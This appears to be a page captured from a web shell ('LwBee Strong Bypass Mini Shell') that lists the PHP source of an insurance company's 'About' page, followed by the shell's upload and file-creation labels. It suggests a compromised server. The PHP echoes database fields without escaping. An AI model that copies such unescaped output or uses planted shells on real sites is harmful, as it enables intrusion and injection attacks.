/home3/vehiclea/public_html/keerthiinsurance/about.php
    <!-- ======= About Us Section ======= -->
  
     <?php
       

        $select_about = select_about();
        $about = mysqli_fetch_array($select_about);
     ?>
     
   
  <section class="about"  id="about">
      <div class="container">
          <div class="section-title">
             <h2>About</h2>
          </div>
         
            <div class="" data-aos="fade-up">
                  <div class="row">
                        <div class="col-md-4 " data-aos="fade-right">
                            <img src="https://admin.keerthiinsurance.com/<?php echo $about['image']?>" class="img-fluidabout" alt="">
                        </div>
                        <div class="col-md-6 pt-4 pt-lg-0 content" data-aos="fade-left">
                            <h3> <?php echo $about['name']?> </h3>
                            <p class="fst-italic">
                          <?php echo $about['content']?>
                      </div>
                  </div>
            </div>
      </div>
    </section>
         
     

     
    <!-- End About Us Section -->
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File